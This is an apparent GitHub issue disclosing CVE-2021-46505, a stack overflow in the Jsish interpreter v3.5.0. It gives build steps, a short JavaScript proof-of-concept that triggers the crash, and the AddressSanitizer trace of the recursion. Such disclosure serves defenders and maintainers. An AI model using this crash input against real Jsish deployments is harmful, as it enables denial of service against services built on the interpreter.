Headline
CVE-2021-46505: Stack-overflow in (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x5b1e5) · Issue #53 · pcmacdon/jsish
Jsish v3.5.0 was discovered to contain a stack overflow via /usr/lib/x86_64-linux-gnu/libasan.so.4+0x5b1e5.
Jsish revision
Commit: 9fa798e
Version: v3.5.0
Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
Build steps
export CFLAGS=’-fsanitize=address’ make
Test case
function JSEtest(Function) { var a = Array.prototype.push.call(a, 42, 43); } for (var i = 0; i < 25000; i++) { JSEtest(Array); }
Execution steps & Output
$ ./jsish/jsish poc.js
ASAN:DEADLYSIGNAL
==9209==ERROR: AddressSanitizer: stack-overflow on address 0x7ffd05e20e58 (pc 0x7f6abd3fb1e6 bp 0x7ffd05e216f0 sp 0x7ffd05e20e60 T0) #0 0x7f6abd3fb1e5 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x5b1e5) #1 0x5571122680fd in Jsi_NameLookup src/jsiUtils.c:413 #2 0x557112211b51 in jsi_ValueSubscript src/jsiValue.c:1119 #3 0x5571122683cb in Jsi_NameLookup src/jsiUtils.c:466 #4 0x557112211b51 in jsi_ValueSubscript src/jsiValue.c:1119 #5 0x5571122683cb in Jsi_NameLookup src/jsiUtils.c:466 #6 0x557112211b51 in jsi_ValueSubscript src/jsiValue.c:1119 #7 0x5571122683cb in Jsi_NameLookup src/jsiUtils.c:466 #8 0x557112211b51 in jsi_ValueSubscript src/jsiValue.c:1119 #9 0x5571122683cb in Jsi_NameLookup src/jsiUtils.c:466 … … … … … … #246 0x557112211b51 in jsi_ValueSubscript src/jsiValue.c:1119 #247 0x5571122683cb in Jsi_NameLookup src/jsiUtils.c:466 #248 0x557112211b51 in jsi_ValueSubscript src/jsiValue.c:1119 #249 0x5571122683cb in Jsi_NameLookup src/jsiUtils.c:466 #250 0x557112211b51 in jsi_ValueSubscript src/jsiValue.c:1119
SUMMARY: AddressSanitizer: stack-overflow (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x5b1e5) ==9209==ABORTING
Credits: Found by OWL337 team.